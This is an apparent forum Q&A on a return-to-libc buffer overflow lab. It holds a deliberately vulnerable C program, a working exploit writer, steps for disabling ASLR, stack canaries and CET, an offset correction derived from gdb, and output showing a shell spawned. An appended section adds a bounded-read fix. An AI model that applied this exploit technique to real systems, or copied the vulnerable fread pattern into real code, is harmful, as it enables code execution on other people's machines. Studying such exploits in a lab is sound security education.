
Return to libc buffer overflow attack

I tried to make a return-to-libc buffer overflow. I found all the addresses for system, exit and /bin/sh. I don't know why, but when I try to run the vulnerable program nothing happens. (Screenshots: system and exit addresses; /bin/sh address.)

Vulnerable program:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(FILE* badfile)
{
    char buffer[BUF_SIZE];

    fread(buffer, sizeof(char), 300, badfile);

    return 1;
}


int main(int argc, char** argv)
{
    FILE* badfile;

    char dummy[BUF_SIZE * 5];

    badfile = fopen("badfile", "r");
    bof(badfile);

    printf("Return properly.\n");

    fclose(badfile);

    return 1;
}

Exploit program:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buf[40];
    FILE* badfile;

    badfile = fopen("./badfile", "w");

    *(long *) &buf[24] = 0xbffffe1e; // /bin/sh
    *(long *) &buf[20] = 0xb7e369d0; // exit
    *(long *) &buf[16] = 0xb7e42da0; // system

    fwrite(buf, sizeof(buf), 1, badfile);
    fclose(badfile);

    return 1;
}

And this is the program that I use to find the MYSHELL address (for /bin/sh):

#include <stdio.h>
#include <stdlib.h>   /* getenv() is declared here */

int main(void)
{
    /* Print the address of the MYSHELL environment variable's value.
     * The cast to unsigned int only makes sense on a 32-bit build (-m32). */
    char* shell = getenv("MYSHELL");
    if(shell)
        printf("%x\n", (unsigned int) shell);
    return 0;
}

Terminal: (screenshot of the terminal after running retlib)

First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:

  • ASLR: You have already disabled it with sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
  • Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then, just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
  • Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that, when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. This (and some other CET protections) can be disabled with -fcf-protection=none.

The question does not mention it, but the addresses used in the code (along with the use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:

gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c

When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from the shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. One being in a different path, or having a different argv, will move the environment variable.

Alternatively, you can print the address of the environment variable from within the vulnerable binary.

By looking at the disassembly of the bof function, the distance between the buffer and the return address can be determined:

(gdb) disassemble bof 
Dump of assembler code for function bof:
   0x565561dd <+0>:     push   %ebp
   0x565561de <+1>:     mov    %esp,%ebp
   0x565561e0 <+3>:     push   %ebx
   0x565561e1 <+4>:     sub    $0x14,%esp
   0x565561e4 <+7>:     call   0x56556286 <__x86.get_pc_thunk.ax>
   0x565561e9 <+12>:    add    $0x2de3,%eax
   0x565561ee <+17>:    pushl  0x8(%ebp)
   0x565561f1 <+20>:    push   $0x12c
   0x565561f6 <+25>:    push   $0x1
   0x565561f8 <+27>:    lea    -0x14(%ebp),%edx
   0x565561fb <+30>:    push   %edx
   0x565561fc <+31>:    mov    %eax,%ebx
   0x565561fe <+33>:    call   0x56556050 <fread@plt>
   0x56556203 <+38>:    add    $0x10,%esp
   0x56556206 <+41>:    mov    $0x1,%eax
   0x5655620b <+46>:    mov    -0x4(%ebp),%ebx
   0x5655620e <+49>:    leave  
   0x5655620f <+50>:    ret    
End of assembler dump.

Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, the saved ebp is 20 bytes away, and the return address is 24 bytes away.

    *(long *) &buf[32] = ...; // /bin/sh
    *(long *) &buf[28] = ...; // exit
    *(long *) &buf[24] = ...; // system

With these changes, the shell is executed by the vulnerable binary:

$ ps
    PID TTY          TIME CMD
1664961 pts/1    00:00:00 bash
1706389 pts/1    00:00:00 bash
1709328 pts/1    00:00:00 ps
$ ./a.out 
$ ps
    PID TTY          TIME CMD
1664961 pts/1    00:00:00 bash
1706389 pts/1    00:00:00 bash
1709329 pts/1    00:00:00 a.out
1709330 pts/1    00:00:00 sh
1709331 pts/1    00:00:00 sh
1709332 pts/1    00:00:00 ps
$ 
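As an added defensive counterpart to the question's bof() (this code is not from the question or the answer), the following shows the bounded read that stops a 300-byte badfile from ever reaching the saved ebp and return address that sit 20 and 24 bytes above the buffer; the in-memory tmpfile stand-in for ./badfile and the helper run_with_payload_length are constructed for this example.

```c
#include <stdio.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

/* Hardened replacement for the question's bof(): the read length is tied to
 * sizeof(buffer) instead of the hard-coded 300, so the overflow that
 * overwrote the saved ebp and return address cannot happen. Returns the
 * number of bytes actually read (0 on a NULL stream, which the original
 * main() would have passed in when fopen("badfile") failed). */
size_t bof_fixed(FILE *badfile)
{
    char buffer[BUF_SIZE];

    if (badfile == NULL)
        return 0;
    /* sizeof(buffer) is the only length fread is ever allowed to use */
    return fread(buffer, sizeof(char), sizeof(buffer), badfile);
}

/* Constructed harness: build an in-memory "badfile" of `len` filler bytes
 * (like the exploit's uninitialised 40-byte buf), feed it through
 * bof_fixed() and report how many bytes were consumed. */
size_t run_with_payload_length(size_t len)
{
    FILE *f = tmpfile();          /* stands in for ./badfile */
    size_t i, consumed;

    if (f == NULL)
        return 0;
    for (i = 0; i < len; i++)
        fputc('A', f);
    rewind(f);
    consumed = bof_fixed(f);
    fclose(f);
    return consumed;
}

int main(void)
{
    printf("300-byte badfile: %zu bytes read into a %d-byte buffer\n",
           run_with_payload_length(300), BUF_SIZE);
    printf("5-byte badfile:   %zu bytes read\n", run_with_payload_length(5));
    printf("missing badfile:  %zu bytes read\n", bof_fixed(NULL));
    return 0;
}
```

Compiled with the same flags as the vulnerable program, the 300-byte badfile now leaves the saved ebp and return address untouched, so the exploit's offsets have nothing to overwrite.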
